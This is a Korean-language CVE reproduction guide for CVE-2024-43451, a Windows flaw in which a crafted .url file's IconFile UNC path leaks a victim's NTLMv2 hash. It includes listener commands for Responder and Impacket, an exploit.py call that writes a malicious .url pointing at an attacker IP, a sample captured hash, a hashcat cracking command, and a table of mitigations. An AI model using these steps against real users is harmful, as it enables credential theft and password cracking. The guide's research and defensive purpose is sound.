
CVE 재현: cve-2024-43451-ntlm_hash_disclosure_reproduction
CVE-2024-43451은 Windows의 NTLMv2 해시 공개 스푸핑 취약점입니다. 인증되지 않은 원격 공격자가 피해자를 악성 .url 바로 가기 파일과 상호작용하도록 유도하여 피해자의 NTLM 해시를 유출할 수 있습니다. 취약점은 최소한의 사용자 상호작용(파일을 마우스 오른쪽 클릭, 삭제 또는 이동하는 것만으로도)으로 트리거됩니다. CVSS 점수는 6.5(중간)이며 실제 환경에서 적극적으로 악용되었습니다. CISA는 이를 알려진 악용 취약점(KEV) 카탈로그에 추가했습니다.
NTLM(NT LAN Manager)은 Windows에서 사용하는 challenge-response 인증 프로토콜입니다. 클라이언트가 SMB를 통해 리소스에 액세스하려고 하면 클라이언트와 서버가 다음과 같이 핸드셰이크를 수행합니다:
NEGOTIATE_MESSAGE를 보냅니다.CHALLENGE_MESSAGE로 응답합니다.AUTHENTICATE_MESSAGE로 응답합니다.공격자가 자신이 제어하는 시스템에 대한 NTLM 인증 시도를 관찰하거나 유도할 수 있는 경우, 캡처된 AUTHENTICATE_MESSAGE는 오프라인에서 크랙되어 평문 비밀번호를 복구할 수 있습니다.
.url 파일은 Internet Explorer 및 Windows 탐색기에서 링크를 저장하는 데 사용되는 바로 가기 파일입니다. INI 형식의 파일이며 [InternetShortcut] 섹션이 있습니다. 악용에 중요한 필드는 다음과 같습니다:
URL= — Windows가 열 대상 URL입니다.IconFile= — 아이콘 리소스의 선택적 UNC 경로입니다. Windows 탐색기가 파일을 렌더링할 때 원격 공유에서 자동으로 아이콘을 검색하여 공격자 서버에 대한 NTLM 인증을 트리거합니다.공격자는 IconFile 매개변수가 \\attacker-ip\share\icon.ico를 가리키는 .url 파일을 만듭니다. 피해자가 다음을 수행하면:
Windows 탐색기가 UNC 경로에서 아이콘을 로드하려고 시도하여 피해자의 NTLMv2 해시를 공격자의 SMB 리스너(예: Responder)로 보냅니다.
2024년 11월 패치 화요일 업데이트 이전의 지원되는 모든 Windows 버전:
| 도구 | 설명 |
|---|---|
| Responder | LLMNR/NBT-NS/mDNS 포이즈너, 해시 캡처를 위한 내장 SMB 서버 포함 |
| Impacket | smbserver.py를 사용하여 간단한 SMB 공유 호스팅 가능 |
| Inveigh | Windows용 PowerShell 기반 NTLM 캡처 도구 |
Responder 사용:
sudo responder -I eth0 -v
또는 Impacket 사용:
sudo impacket-smbserver share . -smb2support
python exploit.py --ip 192.168.1.100 --output malicious.url
다음 작업 중 하나라도 해시 유출을 트리거합니다:
공격자의 SMB 리스너가 NTLMv2 해시를 수신합니다:
[SMB] NTLMv2-SSP Hash : victim::DOMAIN:1122334455667788:0123456789abcdef0123456789abcdef:010100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
hashcat -m 5600 captured.txt /usr/share/wordlists/rockyou.txt
# 전체 PoC 구현은 이 저장소의 exploit.py를 참조하십시오.
# 스크립트는 IconFile이 다음과 같이 설정된 .url 파일을 생성합니다:
# \\192.168.1.100\share\icon.ico
# 선택적으로 IconIndex를 통해 사용자 지정 표시 아이콘을 설정할 수 있습니다.
| 완화 조치 | 설명 |
|---|---|
| 2024년 11월 패치 적용 | KB5044285에서 Microsoft 보안 업데이트 설치 |
| 아웃바운드 SMB 차단 (포트 445) | NTLM 해시가 네트워크 경계를 벗어나지 못하도록 방지 |
| 가능한 경우 NTLM 비활성화 | Kerberos 전용 인증 사용 |
| SMB 서명 활성화 | 해시가 캡처되더라도 릴레이 공격 방지 |
| 사용자 인식 교육 | 사용자가 예상치 못한 .url 파일과 상호작용하지 않도록 교육 |
| .url 파일 처리 제한 | 그룹 정책을 사용하여 이메일을 통한 .url 파일 실행 또는 전달 차단 |